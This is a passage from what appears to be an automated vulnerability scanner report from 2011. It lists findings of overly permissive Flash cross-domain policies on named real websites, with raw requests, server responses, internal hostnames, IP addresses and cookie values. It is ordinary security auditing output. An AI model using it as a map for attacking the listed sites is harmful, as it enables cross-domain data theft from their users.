...[SNIP]...

5.16. http://omniture.virgilio.it/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omniture.virgilio.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:17 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.17. http://paginebianche.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://paginebianche.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: paginebianche.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:28:05 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375285304156; path=/; expires=Thu, 29-Apr-21 22:28:05 GMT; domain=.ilsole24ore.com
Last-Modified: Wed, 18 Mar 2009 13:14:48 GMT
ETag: "670190-d6-4656477ce8200"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-d
...[SNIP]...

5.18. http://paginegialle.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://paginegialle.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: paginegialle.ilsole24ore.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Last-Modified: Mon, 03 Jul 2006 07:55:31 GMT
ETag: "a7cb6a-2e8-44a8cd73"
Content-Type: text/xml
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 744
Connection: close
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- dominio AMBIENTE DI SVILUPPO (e-tree rete interna
...[SNIP]...
<allow-access-from domain="seatpg.e-tree.lan" />
...[SNIP]...
<allow-access-from domain="194.185.174.178" />
...[SNIP]...
<allow-access-from domain="stage.paginegialle.it" />
...[SNIP]...
<allow-access-from domain="www.paginegialle.it" />
...[SNIP]...
<allow-access-from domain="212.48.3.200" />
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.19. http://secure-it.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:42 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 22:17:42 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.20. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:943"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:18:46 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.21. http://video.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:04:50 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:05 GMT
ETag: "278a7e-13b-32a9ec40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.22. http://www.luxury24.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luxury24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luxury24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:45:41 GMT
Server: Apache/2.0.46 (CentOS)
Last-Modified: Tue, 06 Oct 2009 15:51:22 GMT
ETag: "15aca3e-13b-33ad5280"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.23. http://www.motori24.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motori24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motori24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:17 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2
Last-Modified: Tue, 06 Oct 2009 15:51:33 GMT
ETag: "27dc38-13b-34552b40"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" />
...[SNIP]...

5.24. http://www.yoox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yoox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yoox.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 03 Nov 2009 15:10:14 GMT
Accept-Ranges: bytes
ETag: "983995be975cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ORIGIN: Web14
Content-Length: 102
Date: Mon, 02 May 2011 22:45:40 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.25. http://zanox01.webtrekk.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://zanox01.webtrekk.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: zanox01.webtrekk.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Content-Length: 106
Date: Mon, 02 May 2011 22:21:14 GMT
Connection: close
Server: q3/4

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.26. http://adimg.alice.it/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adimg.alice.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adimg.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:32 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 10:38:32 GMT
ETag: "59a-49fb0c73dd6d7"
Accept-Ranges: bytes
Content-Length: 1434
P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="hp.rossoalice.it" />
   <allow-access-from domain="hp.rossoalice.alice.it" />
   <allow-access-from domain="speciali.rossoalice.alice.it" />
   <allow-access-from domain="amici.rossoalice.alice.it" />    
   <allow-access-from domain="community.rossoalice.alice.it" />        
   <allow-access-from domain="live.rossoalice.alice.it" />            
   <allow-access-from domain="giochi.rossoalice.alice.it" />            
   <allow-access-from domain="millegiochi.rossoalice.alice.it" />
   <allow-access-from domain="radioalice.rossoalice.alice.it" />    
   <allow-access-from domain="*.rossoalice.alice.it" />
   <allow-access-from domain="*.rossoalice.virgilio.it" />
<allow-access-from domain="*.yalp.alice.it" />
   <allow-access-from domain="*.alicehometv.alice.it" />
   <allow-access-from domain="*.dailymotion.alice.it" />
   <allow-access-from domain="*.alice.pubdev.dailymotion.com" />
   <allow-access-from domain="dailymotion.virgilio.it" />
   <allow-access-from domain="*.virgilio.it" />
   <allow-access-from domain="*.2mdn.net" secure="true"/>
   <allow-access-from domain="*.cubovision.it" secure="true"/>
   <allow-access-from domain="*.flumotion.com" secure="true"/>
...[SNIP]...

5.27. http://adv.ilsole24ore.it/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adv.ilsole24ore.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:14 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Last-Modified: Tue, 11 Jan 2011 17:00:30 GMT
ETag: "118003-132-4d2c8cae"
Accept-Ranges: bytes
Content-Length: 306
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.weebo.it" />
   <allow-access-from domain="*.deabyday.tv" />
...[SNIP]...

5.28. http://answers.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: answers.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.29. http://api.bing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Mon, 02 May 2011 22:23:14 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=9657056B05E34F21B03456DFC654A712; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=EB15584ECD52449D90E326E400B536A2; expires=Wed, 01-May-2013 22:23:14 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.30. http://edition.cnn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edition.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edition.cnn.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:06 GMT
Server: Apache
Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT
Accept-Ranges: bytes
Content-Length: 2326
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 23:23:21 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>        
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*.salon.com"/>    
   <allow-access-from domain="*.secondthought.com"/>    
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.cnnexpansion.com"/>
   <allow-access-from domain="mediacache.travelzoo.com"/>
   <allow-access-from domain="*.cdn.turner.com"/>    
   <allow-access-from domain="staging.barbariangroup.com"/>
   <allow-access-from domain="*.spreadomat.net"/>
   <allow-access-from domain="CNNShirts.spreadshirt.com"/>        
   <allow-access-from domain="72.3.226.28"/>
   <allow-access-from domain="isg-marketing.com"/>
   <allow-access-from domain="*.isg-marketing.com"/>
   <allow-access-from domain="*isgwidgets.s3.amazonaws.com"/>    
   <allow-access-from domain="*.oprah.com"/>
   <allow-access-from domain="zuse.networld.at"/>
   <allow-access-from domain="*.fusebox.com"/>
   <allow-access-from domain="*.cnnpromos.com"/>        
<allow-access-from domain="*.rtm.com"/>
<allow-access-from domain="*.rtmweb.rtm.com"/>    
<allow-access-from domain="*.stamen.com"/>        
<allow-access-from domain="*.prizelogic.com"/>
...[SNIP]...

5.31. http://en.camera.it/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.camera.it

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT
Vary: Accept-Encoding
Content-Length: 1023
Date: Mon, 02 May 2011 23:56:10 GMT
X-Varnish: 1575094938
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.camera.it" />
<allow-access-from domain="www.camera.it" />
<allow-access-from domain="http://leg16.camera.it" />
<allow-access-from domain="*.camera.it" />
<allow-access-from domain="http://nuovo.camera.it" />
<allow-access-from domain="nuovo.camera.it" />
<allow-access-from domain="*.nuovo.camera.it" />
<allow-access-from domain="http://xm.intra.camera.it" />
<allow-access-from domain="*.xm.intra.camera.it" />
<allow-access-from domain="xm.intra.camera.it" />
<allow-access-from domain="http://xmtenderinter.intra.camera.it" />
<allow-access-from domain="*.xmtenderinter.intra.camera.it" />
<allow-access-from domain="xmtenderinter.intra.camera.it" />
<allow-access-from domain="http://nuovo.intra.camera.it" />
<allow-access-from domain="*.nuovo.intra.camera.it" />
<allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.32. http://finanza-mercati.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: finanza-mercati.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:26 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Thu, 24 Mar 2011 07:09:47 GMT
Accept-Ranges: bytes
Content-Length: 218
Vary: User-Agent
ETag: "2044e1-da-49f3529aa9469"-gzip
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.ilsole24ore.com"/>
</cros
...[SNIP]...

5.33. http://friendfeed.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 321
Vary: Cookie
Server: FriendFeedServer/0.1
Etag: "d69a789b2865b15041af5e97e97c7b933b34666a"
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: AT=14162173952499924949_1304375087; Domain=.friendfeed.com; Path=/

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.friendfeed.com"/>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...

5.34. http://giochi-tiscali.king.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://giochi-tiscali.king.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: giochi-tiscali.king.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:25:27 GMT
Server: Apache
Expires: Mon, 02 May 2011 22:35:27 GMT
Content-Length: 2487
Content-Type: text/xml; charset=iso-8859-1
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.king.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="217.212.243.23" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="giochi.corrieredellosport.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="giochi.gossipnews.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="it.king.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.it.msn.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="iti1.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="kingit.pantherssl.com" secure="false" to-ports="*" />
...[SNIP]...

5.35. http://it.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.yahoo.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 22:25:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: application/xml
Age: 0
Server: YTS/1.20.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.36. http://itunes.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce5473e53a"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=454
Date: Mon, 02 May 2011 22:25:41 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

5.37. http://nuovo.camera.it/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nuovo.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

